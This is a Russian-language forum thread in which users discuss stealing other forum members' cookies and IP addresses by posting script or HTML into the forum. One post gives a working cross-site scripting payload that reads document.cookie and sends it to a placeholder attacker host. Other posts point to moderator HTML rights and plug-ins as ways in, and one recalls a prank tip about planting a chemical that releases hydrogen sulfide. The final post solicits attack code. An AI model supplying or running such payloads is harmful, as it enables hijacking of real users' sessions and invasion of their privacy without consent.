Увидеть айпишник через куки
если предположить, что ты в сети (гы-гы, ну ты, конечно, не в локалке, но неважно) - то без проблем. Грузишь страницу с локального сервера, передавая обработчику данные.
купи хоть раз журнал хакер, и открой для себя удивительный мир web-дырок.
Можешь расписать идею поподробнее? Какую страницу, с какого сервера и какие данные? Агентуру в локалке найдем.
Можно прислать юзеру ссылку на мой ресурс на апаче-сервере и посмотреть с какого айпишника его открывали, но это что-то не то.
Можно прислать юзеру ссылку на мой ресурс на апаче-сервере и посмотреть с какого айпишника его открывали, но это что-то не то.
Читал в молодости. Запомнились советы подложить в гостях в их цветочный горшок химикат, выделяющий H2S при поливе его водой. И совет как в маил.ру в окошко постить кусок скрипта, чтобы воровать пользователей, ту дырку давно закрыли.
Шо, таки для любого браузера? %)
> И совет как в маил.ру в окошко постить кусок скрипта, чтобы воровать пользователей, ту дырку давно закрыли.
на mail.ru то может и закрыли, а модераторы на forum.local - это до сих пор могут.
на mail.ru то может и закрыли, а модераторы на forum.local - это до сих пор могут.
работа JavaScript-а разве зависит от браузера?
А разве нет?
в данном случае, это разница не сильно повлияет, особенно если учесть, что для узнавания ip-а можно обойтись , в том числе, и без JavaScript-а.
А можно код данного случая?
Напиши в приват детали реализации. Ты пробовал?
Забыл в сабж "[КРЕАТИВ]" запихнуть.
Исправляйся.
Исправляйся.
<img src="xxx"/>
И где тут отсылка куки?
так тебе нужен ip или куки?
По-моему вполне очевидно что мне нужно 
>По-моему вполне очевидно что мне нужно
совсем неочевидно, т.к. то говорят, что им cookie нужны, чтобы Ip увидеть, то ip нужен, чтобы cookie увидеть...
совсем неочевидно, т.к. то говорят, что им cookie нужны, чтобы Ip увидеть, то ip нужен, чтобы cookie увидеть...
Ну, я подумал, что раз уж ты начал мне отвечать про реализации JavaScript, то ты понял, что мне нужно не img src 
дык, через img src можно получить, как cookie, так и ip.
Код для отправки куков без js приведешь?
Если нет, то приводи с js работающий для любого(ограничимся чтобы работало для ie, ff, opera) броузера
Если нет, то приводи с js работающий для любого(ограничимся чтобы работало для ie, ff, opera) броузера
> Код для отправки куков без js приведешь?
делается через вставку Flash-а, Java-апплета, .Net-апплета, ActiveX-апплета.
> Если нет, то приводи с js работающий для любого(ограничимся чтобы работало для ie, ff, opera) броузера
обычного document.cookie - хватает.
делается через вставку Flash-а, Java-апплета, .Net-апплета, ActiveX-апплета.
> Если нет, то приводи с js работающий для любого(ограничимся чтобы работало для ie, ff, opera) броузера
обычного document.cookie - хватает.
<img src="javascript:execScript('e=document.cookie;document.images[1]
.src=\'http://malicious.host.com/shit.pl?ck=\'+e')"></img>В эксплорере вроде работало.
делается через вставку Flash-а, Java-апплета, .Net-апплета, ActiveX-апплетаИ как их в этот форум вставить?
обычного document.cookie - хватает.Возвращаемся к началу: для любого броузера?
Я возможно неточно выразился, но подразумевалось, что будет работать во всех трех браузерах, а не в одном из них.
>И как их в этот форум вставить?
как html, если есть права модератора
> Возвращаемся к началу: для любого броузера?
для ie, ff и opera с настройками по умолчанию - работает.
как html, если есть права модератора
> Возвращаемся к началу: для любого броузера?
для ie, ff и opera с настройками по умолчанию - работает.
1.Угу, неплохое такое если
2. Странно, а я всегда думал что отсылка куки удаленному серверу - это дырка специфичная для ie. Видимо я ошибался...
Что ж приношу свои извинения за потраченное на меня время.
2. Странно, а я всегда думал что отсылка куки удаленному серверу - это дырка специфичная для ie. Видимо я ошибался...
Что ж приношу свои извинения за потраченное на меня время.
> 1.Угу, неплохое такое если
да, но есть проблема - модератор на форуме сейчас каждый второй.
да, но есть проблема - модератор на форуме сейчас каждый второй.
нифига, каждый сотый
да, но есть проблема - модератор на форуме сейчас каждый второй бот йон_бровера
нифига, каждый сотый бот йон_бровера
>как html, если есть права модератора
к сведению, все посты в формате хтмл скидываются в лог
к сведению, все посты в формате хтмл скидываются в лог
Означает ли это, что этот лог периодически просматривают?
если форум хакнут, то посмотрят
ну да, они на мыло сыпятся 
Оставить комментарий
dept08
Attila утверждает, что с помощью загрузки javascript на форум можно заполучить куки любого юзера, который логинился в форум. И извлечь оттуда его IP-адрес. Что вы думаете по этому поводу? Предложите примерный алгоритм и код скрипта, как это сделать. Или предложите ссылку, что почитать на эту тему. Или докажите, что форум защищен от этого.